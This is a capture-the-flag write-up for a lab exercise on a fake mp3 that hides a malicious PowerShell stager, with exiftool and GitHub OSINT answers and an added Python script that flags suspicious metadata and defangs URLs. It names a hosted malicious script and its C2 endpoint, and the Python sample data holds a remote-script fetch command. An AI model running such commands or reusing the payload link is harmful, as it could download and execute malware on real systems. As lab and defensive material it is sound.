# Day 1

#### Description

McSkidy found a site, well, what could this be? A video goes in, out comes an mp3. That was its function, or that was its claim! She found it malicious, but who was to blame? Someone named "The Glitch", that was her take. Until something she found, an OPSEC mistake…

#### Task 7: Maybe SOC-mas music, he thought, doesn't come from a store?

**1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?**

We can use the `exiftool` command to extract the metadata of the mp3:

`exiftool song.mp3`

```makefile
Ans: Tyler Ramsbey
```

**2. The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?**

1. Run `exiftool somg.mp3`; its output contains a URL.
2. Navigate to that URL: <https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1>
3. Inspecting the script at that URL reveals the C2 server URL below.

```bash
Ans: http://papash3ll.thm/data
```
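The same triage can be scripted for a batch of downloads. The following is an added example, not part of the original write-up: it parses `exiftool -json` output, flags files whose detected type does not match their extension, and pulls defanged URLs out of every metadata field. The file names, field values and URLs in the sample are constructed.

```python
import json
import os
import re

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)

# Constructed sample of `exiftool -json` output; names and values are illustrative only.
SAMPLE_EXIFTOOL_JSON = r'''
[
  {"SourceFile": "track_a.mp3", "FileType": "MP3", "FileTypeExtension": "mp3",
   "Artist": "Example Artist"},
  {"SourceFile": "track_b.mp3", "FileType": "LNK", "FileTypeExtension": "lnk",
   "CommandLineArguments": "-c \"iwr 'https://files.example.test/stage/run.ps1'\""}
]
'''

def extract_urls(text):
    """Return the unique URLs in text, in order of first appearance."""
    return list(dict.fromkeys(URL_RE.findall(text)))

def defang(url):
    """Make a URL non-clickable so it is safe to paste into reports and tickets."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE).replace(".", "[.]")

def walk_strings(value):
    """Yield every string nested anywhere in a decoded JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from walk_strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from walk_strings(item)

def triage(exiftool_json):
    """Summarise each file: extension/type mismatch and any URLs in its metadata."""
    findings = []
    for record in json.loads(exiftool_json):
        name = record.get("SourceFile", "")
        claimed = os.path.splitext(name)[1].lstrip(".").lower()
        detected = str(record.get("FileTypeExtension", "")).lower()
        # Skip SourceFile itself so a path never counts as a metadata hit.
        fields = {k: v for k, v in record.items() if k != "SourceFile"}
        urls = extract_urls("\n".join(walk_strings(fields)))
        findings.append({"file": name,
                         "type_mismatch": bool(detected) and detected != claimed,
                         "urls": [defang(u) for u in urls]})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EXIFTOOL_JSON):
        print(finding)
```

`extract_urls` also works on the text of a downloaded script, which is how the C2 URL in step 3 would be pulled out without opening the script in a browser.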

**3. Who is M.M? Maybe his Github profile page would provide clues?**

1. Search GitHub for the string "Created by the one and only M.M.", or go directly to this link: <https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues>
2. You'll notice something interesting if you explore the pages in the search results.
3. Click on his profile and check his repository to find his name.

```makefile
Ans: Mayor Malware
```

**4. What is the number of commits on the GitHub repo where the issue was raised?**

Looking at his repos, we can see that he has 1 commit.

```makefile
Ans: 1
```

